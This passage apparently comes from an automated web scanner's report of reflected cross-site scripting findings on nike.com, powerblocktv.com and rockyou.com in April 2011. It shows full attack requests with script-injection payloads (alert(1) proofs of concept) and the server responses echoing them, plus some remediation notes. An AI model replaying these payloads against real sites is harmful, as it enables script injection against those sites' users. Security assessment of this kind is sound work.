GET /nsl/services/user/isloggedin8d93d<img%20src%3da%20onerror%3dalert(1)>43df17930bb?format=json&app=ballersresume&callback=jsonp1303153392700 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Content-Language: en-US
Content-Length: 4146
Content-Type: application/json;charset=utf-8
Expires: Mon, 18 Apr 2011 19:03:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:03:00 GMT
Connection: close
Set-Cookie: AnalysisUserId=66.160.206.31.1303153380363542; path=/; expires=Tue, 17-Apr-12 19:03:00 GMT; domain=.nike.com
Set-Cookie: JSESSIONID=F46E8DD7DA8AA1CE72908A84205128B1.sin-18-social-1; Domain=.nike.com; Path=/
Set-Cookie: SOCTOKEN=ballersresume|30eb8eda-bfc1-4e6f-8004-b9298a24bc68; Domain=.nike.com; Path=/

jsonp1303153392700({"serviceResponse": {
"header": {
"success": "false",
"dateTime": "2011-04-18 19:03:00.479 UTC",
"errorCodes": [
{
"code": "nsl_generic_error",
"message": "cannot find the isloggedin8d93d<img src=a onerror=alert(1)>43df17930bb method.",
"causeString": "java.lang.NullPointerException\u000ajava.lang.Class.searchMethods(Class.java:2646)\u000ajava.lang.Class.getMethod0(Class.java:2670)\u000ajava.lang.Class.getMethod(Cla
...[SNIP]...
4.141. http://www.nike.com/nsl/services/user/isloggedin [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nike.com
Path:   /nsl/services/user/isloggedin

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 35a95<script>alert(1)</script>64c16fbc047 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nsl/services/user/isloggedin?format=json&app=ballersresume&callback=jsonp130315339270035a95<script>alert(1)</script>64c16fbc047 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nike.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Content-Language: en-US
Content-Length: 216
Content-Type: application/json;charset=utf-8
Expires: Mon, 18 Apr 2011 19:02:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:02:43 GMT
Connection: close
Set-Cookie: AnalysisUserId=64.212.60.188.1303153363042556; path=/; expires=Tue, 17-Apr-12 19:02:43 GMT; domain=.nike.com

jsonp130315339270035a95<script>alert(1)</script>64c16fbc047({"serviceResponse": {
"header": {
"success": "false",
"dateTime": "2011-04-18 19:02:43.50 UTC",
"errorCodes": [
]
},
"body": {}
}});
4.142. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e205"-alert(1)-"df5df20c25c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3?2e205"-alert(1)-"df5df20c25c=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=kef6as1gij6m5t71r81rkjqdn2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/?2e205"-alert(1)-"df5df20c25c=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...
4.143. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b48d--><script>alert(1)</script>d4c896e4647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3?5b48d--><script>alert(1)</script>d4c896e4647=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=jf9p5s3n2i55jpinqanm3p6lh6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php?5b48d--><script>alert(1)</script>d4c896e4647=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...
4.144. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 866d0--><script>alert(1)</script>f077daa7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3/?866d0--><script>alert(1)</script>f077daa7caa=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=0sj6r0fsgckvhq2fi6m4msanb4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php?866d0--><script>alert(1)</script>f077daa7caa=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...
4.145. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345d8"-alert(1)-"4bb40acc350 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3/?345d8"-alert(1)-"4bb40acc350=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=74t3j28l0kfbactd0l4b8gbnr0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/?345d8"-alert(1)-"4bb40acc350=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...
4.146. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/fpss/templates/pb-temp/template_css.php

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload e31f2<script>alert(1)</script>21efb87fa3a was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3/fpss/templates/pb-temp/template_css.php?w=675&h=275e31f2<script>alert(1)</script>21efb87fa3a&sw=200 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 4098
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" by JoomlaWorks - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from JoomlaWorks
...[SNIP]...
;*/width:675px;border:0px solid #ccc;padding:0px;margin:0px auto;}
#fpss-container {position:relative;width:675px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:675px;height:275e31f2<script>alert(1)</script>21efb87fa3apx;}
#slide-loading {background:#000 url(loading_black.gif) no-repeat center;text-align:center;width:675px;height:275e31f2<script>
...[SNIP]...
4.147. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/fpss/templates/pb-temp/template_css.php

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 5f01e<script>alert(1)</script>b3b56be9b1a was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3/fpss/templates/pb-temp/template_css.php?w=6755f01e<script>alert(1)</script>b3b56be9b1a&h=275&sw=200 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 4098
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" by JoomlaWorks - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from JoomlaWorks
...[SNIP]...
rontpageslideshow.net
// Developers: Fotis Evangelou - George Chouliaras
// ***Last update: May 4th, 2008***
*/

/* --- Slideshow Containers --- */
#fpss-outer-container {/*clear:both;*/width:6755f01e<script>alert(1)</script>b3b56be9b1apx;border:0px solid #ccc;padding:0px;margin:0px auto;}
#fpss-container {position:relative;width:6755f01e<script>
...[SNIP]...
4.148. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/index.php/xtreme

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8299--><script>alert(1)</script>b3fc064eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3/index.php/xtreme?a8299--><script>alert(1)</script>b3fc064eb=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; __utmz=4694322.1303144987.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; com_jw_fpss=true; __utma=4694322.1437869223.1303144987.1303144987.1303144987.1; __utmc=4694322; __utmb=4694322.500.10.1303144987

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:46:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 59209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php/xtreme?a8299--><script>alert(1)</script>b3fc064eb=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...
4.149. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/index.php/xtreme

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979f7"-alert(1)-"f80e343a350 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3/index.php/xtreme?979f7"-alert(1)-"f80e343a350=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; __utmz=4694322.1303144987.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; com_jw_fpss=true; __utma=4694322.1437869223.1303144987.1303144987.1303144987.1; __utmc=4694322; __utmb=4694322.500.10.1303144987

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:46:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 59153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/index.php/xtreme?979f7"-alert(1)-"f80e343a350=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...
4.150. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /developer/opensocial/opensocial-css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c370c<script>alert(1)</script>d157fc9846a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developer/opensocial/opensocial-css.php?title=http://dev2.rockyou.com/developer/opensocial/images/bg-title-products/c370c<script>alert(1)</script>d157fc9846a.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:54:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=2734 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/css
Content-Length: 416

table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}

.titlebar {background:url(http://dev2.rockyou.com/developer/opensocial/images/bg-title-products/c370c<script>alert(1)</script>d157fc9846a.gif) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}
4.151. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /developer/opensocial/opensocial-css.php

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 41041<script>alert(1)</script>916712ea3da was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developer/opensocial/opensocial-css.php?title=http://dev2.rockyou.com/developer/opensocial/images/bg-title-products.gif41041<script>alert(1)</script>916712ea3da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:54:05 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=2674 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/css
Content-Length: 415

table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}

.titlebar {background:url(http://dev2.rockyou.com/developer/opensocial/images/bg-title-products.gif41041<script>alert(1)</script>916712ea3da) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}
4.152. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4db16'><script>alert(1)</script>70ef5e4caf7 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E4db16'><script>alert(1)</script>70ef5e4caf7 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164368; sns_type=rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:26 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1186 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 493

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E4db16'><script>alert(1)</script>70ef5e4caf7'></fo
...[SNIP]...
4.153. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89cfe'><script>alert(1)</script>7080b8b8398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E&89cfe'><script>alert(1)</script>7080b8b8398=1 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
